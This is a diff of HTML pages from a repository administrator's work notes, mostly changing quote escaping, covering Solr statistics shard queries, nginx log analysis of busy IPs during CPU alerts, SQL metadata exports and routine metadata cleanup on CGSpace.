{&#39;id&#39;: [&#39;77572&#39;, 646, &#39;93185&#39;, 380, &#39;92932&#39;, 375, &#39;102499&#39;, 372, &#39;101430&#39;, 337, &#39;77632&#39;, 331, &#39;102449&#39;, 289, &#39;102485&#39;, 276, &#39;100849&#39;, 270, &#39;47080&#39;, 260]}
</code></pre><ul>
<li>If I double check one item from above, for example <code>77572</code>, it appears this is only working on the current statistics core and not the shards:</li>
</ul>
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
646
solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics-2018/&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
595
</code></pre><ul>
@ -894,13 +894,13 @@ print(results.hits)
<li>I think I figured out how to search across shards: I needed to give the whole URL of each of the other cores</li>
<li>Now I get more results when I start adding the other statistics cores:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound&lt;result name=&quot;response&quot; numFound=&quot;2061320&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;16280292&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;25606142&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;31532212&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound&lt;result name=&#34;response&#34; numFound=&#34;2061320&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;16280292&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;25606142&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;31532212&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
</code></pre><ul>
<li>I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the <code>shards</code> parameter to each query to make the search distributed among the cores</li>
<li>I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a <code>shards</code> query string</li>
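<li>A rough sketch of that proof of concept (not the actual code that shipped; it assumes the requests library and that Solr answers on localhost:8081 like the examples above):</li>
</ul>
<pre tabindex="0"><code>import requests

# ask the Solr CoreAdmin API which cores are active
solr = &#39;http://localhost:8081/solr&#39;
status = requests.get(solr + &#39;/admin/cores&#39;, params={&#39;action&#39;: &#39;STATUS&#39;, &#39;wt&#39;: &#39;json&#39;}).json()

# keep the statistics core and its yearly shards, then build the shards string
cores = [c for c in status[&#39;status&#39;] if c.startswith(&#39;statistics&#39;)]
shards = &#39;,&#39;.join(&#39;localhost:8081/solr/&#39; + c for c in cores)

# every statistics query then gets the shards parameter appended
params = {&#39;q&#39;: &#39;type:2 id:11576&#39;, &#39;fq&#39;: [&#39;isBot:false&#39;, &#39;statistics_type:view&#39;],
          &#39;rows&#39;: 0, &#39;wt&#39;: &#39;json&#39;, &#39;shards&#39;: shards}
r = requests.get(solr + &#39;/statistics/select&#39;, params=params)
print(r.json()[&#39;response&#39;][&#39;numFound&#39;])
</code></pre><ul>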
@ -913,10 +913,10 @@ $ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;275&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;275&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
</code></pre><h2 id="2019-01-22">2019-01-22</h2>
<ul>
<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v0.9.0">version 0.9.0 of the dspace-statistics-api</a> to address the issue of querying multiple Solr statistics shards</li>
@ -924,7 +924,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<li>I deployed it on CGSpace (linode18) and restarted the indexer as well</li>
<li>Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Jan/2019:1(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Jan/2019:1(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
155 40.77.167.106
176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
189 107.21.16.70
@ -979,13 +979,13 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<p>I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:</p>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/35501&#39;, &#39;10568/41728&#39;, &#39;10568/49622&#39;, &#39;10568/56589&#39;, &#39;10568/56592&#39;, &#39;10568/65064&#39;, &#39;10568/65718&#39;, &#39;10568/65719&#39;, &#39;10568/67373&#39;, &#39;10568/67731&#39;, &#39;10568/68235&#39;, &#39;10568/68546&#39;, &#39;10568/69089&#39;, &#39;10568/69160&#39;, &#39;10568/69419&#39;, &#39;10568/69556&#39;, &#39;10568/70131&#39;, &#39;10568/70252&#39;, &#39;10568/70978&#39;))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
COPY 1109
</code></pre><ul>
<li>Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP</li>
<li>Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 54.226.25.74
241 40.77.167.13
272 46.101.86.248
@ -1038,13 +1038,13 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace fi
zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
Food safety Kenya fruits.pdf[0]=&gt;Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1747.
</code></pre><ul>
<li>I reported it to the Arch Linux bug tracker (<a href="https://bugs.archlinux.org/task/61513">61513</a>)</li>
<li>I told Atmire to go ahead with the Metadata Quality Module addition based on our <code>5_x-dev</code> branch (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">657</a>)</li>
<li>Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
305 3.81.136.184
306 3.83.14.11
306 52.54.252.47
@ -1059,7 +1059,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li>45.5.186.2 is CIAT and 66.249.64.155 is Google&hellip; hmmm.</li>
<li>Linode sent another alert this morning, here are the top ten IPs active during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
360 3.89.134.93
362 34.230.15.139
366 100.24.48.177
@ -1073,7 +1073,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</code></pre><ul>
<li>Just double checking what CIAT is doing, they are mainly hitting the REST API:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:&quot; | grep 45.5.186.2 | grep -Eo &quot;GET /(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:&#34; | grep 45.5.186.2 | grep -Eo &#34;GET /(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
</code></pre><ul>
<li>CIAT&rsquo;s community currently has 12,000 items in it so this is normal</li>
<li>The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again&hellip;</li>
@ -1102,7 +1102,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 40.77.167.108
191 157.55.39.2
263 34.218.226.147
@ -1132,7 +1132,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 207.46.13.50
105 41.204.190.40
117 34.218.226.147
@ -1153,7 +1153,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
310 45.5.184.2
425 5.143.231.39
526 54.70.40.11
@ -1173,7 +1173,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Jan/2019:0(3|4|5|6|7)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Jan/2019:0(3|4|5|6|7)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
334 45.5.184.72
429 66.249.66.223
522 35.237.175.180
@ -1198,7 +1198,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
273 46.101.86.248
301 35.237.175.180
334 45.5.184.72
@ -1216,7 +1216,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:(16|17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:(16|17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
436 18.196.196.108
460 157.55.39.168
460 207.46.13.96
@ -1227,7 +1227,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
1601 85.25.237.71
1894 66.249.66.219
2610 45.5.184.2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;31/Jan/2019:0(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;31/Jan/2019:0(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
318 207.46.13.242
334 45.5.184.72
486 35.237.175.180

View File

@ -12,7 +12,7 @@
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -28,7 +28,7 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -49,7 +49,7 @@ sys 0m1.979s
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -65,14 +65,14 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
user 0m22.203s
sys 0m1.979s
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,7 +163,7 @@ sys 0m1.979s
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -179,7 +179,7 @@ sys 0m1.979s
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -198,7 +198,7 @@ sys 0m1.979s
<ul>
<li>Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Feb/2019:0(1|2|3|4|5)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Feb/2019:0(1|2|3|4|5)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
284 18.195.78.144
329 207.46.13.32
417 35.237.175.180
@ -219,7 +219,7 @@ sys 0m1.979s
<li>This is seriously getting annoying: Linode sent another alert this morning that CGSpace (linode18) load was 377%!</li>
<li>Here are the top IPs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
325 85.25.237.71
340 45.5.184.72
431 5.143.231.8
@ -238,7 +238,7 @@ sys 0m1.979s
</code></pre><ul>
<li>This user was making 2060 requests per minute this morning&hellip; seems like I should try to block this type of behavior heuristically, regardless of user agent!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019&quot; | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019&#34; | grep 195.201.104.240 | grep -o -E &#39;03/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 20
19 03/Feb/2019:07:42
20 03/Feb/2019:07:12
21 03/Feb/2019:07:27
@ -262,7 +262,7 @@ sys 0m1.979s
</code></pre><ul>
<li>At least they re-used their Tomcat session!</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240&#39; dspace.log.2019-02-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>This user was making requests to <code>/browse</code>, which is not currently under the existing rate limiting of dynamic pages in our nginx config
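</li>
<li>For reference, heuristic limiting in nginx could hypothetically look something like this (the zone name, rate, and burst values here are invented for illustration and are not our actual configuration):</li>
</ul>
<pre tabindex="0"><code># track clients by IP address and allow a modest rate on dynamic pages,
# regardless of what user agent they claim to be
limit_req_zone $binary_remote_addr zone=dynamicpages:16m rate=30r/m;

location /browse {
    # allow short bursts, then reject further requests with HTTP 503
    limit_req zone=dynamicpages burst=20 nodelay;
    # ... proxy_pass to Tomcat as in the rest of the config
}
</code></pre><ul>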
@ -287,7 +287,7 @@ COPY 321
<li>Discuss the new IITA research theme field with Abenet and decide that we should use <code>cg.identifier.iitatheme</code></li>
<li>This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
589 2a01:4f8:140:3192::2
762 66.249.66.219
889 35.237.175.180
@ -318,12 +318,12 @@ COPY 321
</code></pre><ul>
<li>Testing the corrections for sixty-five items and sixteen deletions using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> and <a href="https://gist.github.com/alanorth/bd7d58c947f686401a2b1fadc78736be">delete-metadata-values.py</a> scripts:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>I applied them on DSpace Test and CGSpace and started a full Discovery re-index:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Peter had marked several terms with <code>||</code> to indicate multiple values in his corrections so I will have to go back and do those manually:</li>
@ -344,7 +344,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Then I used <code>csvcut</code> to get only the CTA subject columns:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c &quot;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&quot; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
<pre tabindex="0"><code>$ csvcut -c &#34;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&#34; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
</code></pre><ul>
<li>After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values</li>
<li>Then I imported it back into CGSpace:</li>
@ -354,7 +354,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Another day, another alert about high load on CGSpace (linode18) from Linode</li>
<li>This time the load average was 370% and the top ten IPs before, during, and after that time were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
689 35.237.175.180
1236 5.9.6.51
1305 34.218.226.147
@ -368,7 +368,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Looking closer at the top users, I see <code>45.5.186.2</code> is in Brazil and was making over 100 requests per minute to the REST API:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
